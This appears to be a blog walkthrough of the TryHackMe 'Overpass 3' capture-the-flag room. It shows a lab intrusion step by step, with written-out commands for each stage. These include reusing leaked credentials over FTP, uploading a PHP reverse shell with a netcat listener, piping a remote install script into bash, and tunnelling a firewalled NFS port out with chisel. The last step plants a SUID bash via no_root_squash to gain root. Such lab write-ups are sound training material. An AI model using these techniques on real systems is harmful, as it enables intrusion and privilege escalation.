- Link: https://tryhackme.com/room/overpass3hosting
- Difficulty: Medium
- Target: web, user, root flags
- Highlight: port forwarding with
This is the third and final installment of the Overpass challenges on TryHackMe. Here are the other two overpass walkthroughs, just in case you missed them:
In today’s challenge, the team of comp-sci students is at it again with a new website hosting company. However, they haven’t learned much yet about security.
We’ll hack into their new site and escalate our privileges to the root user, and show them that they need to make some security upgrades.
First, we’ll note down our IPs in export format to use as bash variables.
export targetIP=10.10.232.238 export myIP=10.6.2.23
Let’s also start a regular
nmap scan of all ports, and a
dirb scan to sniff out web app directories.
dirb scan found a
/backups directory that reveals a
/backups (backups.zip) ─[kalisurfer@parrot]─[~] └──╼ $dirb http://10.10.232.238 ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Thu Jan 5 11:16:14 2023 URL_BASE: http://10.10.232.238/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt GENERATED WORDS: 4612 ---- Scanning URL: http://10.10.232.238/ ---- ==> DIRECTORY: http://10.10.232.238/backups/ + http://10.10.232.238/cgi-bin/ (CODE:403|SIZE:217) + http://10.10.232.238/index.html (CODE:200|SIZE:1770) ---- Entering directory: http://10.10.232.238/backups/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ----------------- END_TIME: Thu Jan 5 11:23:15 2023 DOWNLOADED: 4612 - FOUND: 2
After unzipping the
backups.zip file, we have two files:
Let’s move ahead and import the
priv.key file using
pgp –import priv.key pgp –decrypt-file CustomerDetails.xlsx.pgp
And now there is a third file:
This file is a spreadsheet with customer data including username/passwords and credit card numbers! Let’s record the passwords in our
notes.txt file for later reference.
username:password paradox ShibesAreGreat123 0day OllieIsTheBestDog muirlandoracle A11D0gsAreAw3s0me
nmap scan shows a few ports open: An FTP service running on port 21, SSH on 22, HTTP on 80.
The FTP server may allow anonymous login. We’ll test that out soon. First, we’ll drill in a bit more on the open ports with a second
WALKING THE WEBSITE
There’s not much of use on the website running on port 80. Nothing stands out in the text on the site except the potential usernames and hobbies:
Paradox - Our lead web designer, Paradox can help you create your dream website from the ground up Elf - Overpass' newest intern, Elf. Elf helps maintain the webservers day to day to keep your site running smoothly and quickly. MuirlandOracle - HTTPS and networking specialist. Muir's many years of experience and enthusiasm for networking keeps Overpass running, and your sites, online all of the time. NinjaJc01 - James started Overpass, and keeps the business side running. If you have pricing questions or want to discuss how Overpass can help your business, reach out to him!
A quick look through the source code and the developer mode doesn’t reveal anything more here.
CONNECTING WITH FTP
We test out connecting to the FTP service as user paradox with the command:
lftp -u paradox $targetIP password=ShibesAreGreat123 (from the xlsx spreadsheet)
We are connected and can see a bunch of files and a directory for backups.
Now that we are connected to the web hosting service, we can upload a payload to spawn a reverse shell to give us an initial foothold into the box.
CRAFTING A REVERSE SHELL PAYLOAD
We’ll use the pentest monkey php reverse shell from revshells.com. This is a good choice because PHP files autorun on websites when the page is loaded. I’ve also used this payload successfully before on another box.
Let’s go ahead and copy the PHP reverse shell, add our
lport to the file, and save the revshell as
rev.php. I’ll use port 8888.
UPLOADING THE PAYLOAD WITH FTP
Let’s use the terminal window still connected to the FTP service to upload the
rev.php file with the command:
And now, the file is in position and ready to use.
SPINNING UP A NETCAT LISTENER TO CATCH A REVSHELL
nc -lvnp 8888
Next we’ll navigate in our browser to
At this point, our netcat listener catches the revshell and we now have an initial foothold as user apache!!
Let’s search for the
web.flag file with the following command:
find / -type f -name web.flag 2>/dev/null
The last part of this command (
2>/dev/null) sends the error messages to a null byte, hiding all of the errors.
And we’ve found it!
STABILIZE A REVSHELL
We can use a Python one-liner to stabilize the shell enough to be able to switch users.
python3 -c 'import pty;pty.spawn("/bin/bash")'
Now we can do a lateral move over to paradox’s account with the password from the spreadsheet.
RUNNING LINPEAS ON THE TARGET MACHINE
The most interesting finding of
╔══════════╣ Analyzing NFS Exports Files (limit 70) -rw-r--r--. 1 root root 54 Nov 18 2020 /etc/exports /home/james *(rw,fsid=0,sync,no_root_squash,insecure)
no_root_squash is a misconfiguration that allows unprivileged users to gain root access to the machine.
👉 Recommended: No Root Squash
We can see that it is set in user James’ home folder. So now our attack vector is becoming clearer. We will look for ways to privilege escalate over the James’ account.
After stabilizing the revshell we can try a lateral move and switch users to
su paradox Password(ShibesAreGreat123)
EXPLOITING NFS WITH NO_ROOT_SQUASH
Following up now on the
linpeas results, let’s investigate this NFS service a bit more. Nothing showed up in the
nmap scan, but it did in the
linpeas results so my hunch is that the service is firewalled from the outside.
This isn’t a problem to work around, but we need to determine the port that the service is operating on. With the following command on the target machine we can find the port:
rpcinfo -p | grep nfs
We can see in the output that NFS is running on port is 2049. We’ll use a specialized secure ssh port forwarding tool,
chisel to help us reroute the blocked port to our attack machine.
USING CHISEL TO PORT FORWARD
We’ll need to grab
chisel from the GitHub page. There are a few ways to install it from the repo. I chose to use the one-liner:
curl https://i.jpillora.com/chisel! | bash
Once installed, I copied the
chisel bin file over to the target machine. To get this done, we’ll spin up a simple HTTP server using Python, and then
curl the file from the target machine.
chisel is on both machines, let’s create the secure SSH tunnel with the following commands to set up port forwarding on the NFS service running on port 2049, but firewalled to the public.
From the attack box:
chisel server -p 7777 --reverse -v
From victim box:
./chisel client 10.6.2.23:7777 R:2049:127.0.0.1:2049 &
& at the end of the command instructs bash to run the command in the background in a subshell.
Now let’s check to see if the NFS has any mountable directories available:
showmount -e $targetIP:2049
Another way to check is to run:
Now let’s go ahead and mount to the folder
/mount (which already exists on my machine):
sudo mount -t nfs $targetIP:/ /mount
user.flag is right there in the
/home/james directory! Checking for hidden files and directories with “
ls -la” reveals a hidden directory (
.ssh). Inside this directory we’ve found an ssh key.
Let’s copy this over to our machine so that we can
ssh directly into James’ directory without needing their password.
GAINING ROOT PRIVILEGES WITH PERSISTENCE
From James’ account, we should be able to both set and run files with
suid bits to spawn bash as root in persistence mode. Let’s first copy
/bin/bash to our current file:
On target box:
cp /bin/bash .
And then add execute and add the SUID bit from our mounted NFS folder on the attack box:
chmod +xs bash
Last, but not least, let’s run it with persistence from the target box:
And we are now root! Let’s grab the
RECOMMENDED MITIGATION STEPS
- Change permissions on all parts of the website that are not intended to be seen by the public. This includes the
👉 Recommended Tutorial: TryHackMe Challenge – Wonderland
I am a freelance ethical hacker/penetration tester. I have extensive experience in penetration testing and vulnerability assessments on web apps and servers. I am also fluent in Mandarin and have 15 years of experience as an edTech integration specialist, curriculum designer, and foreign language teacher. Here’s my personal website.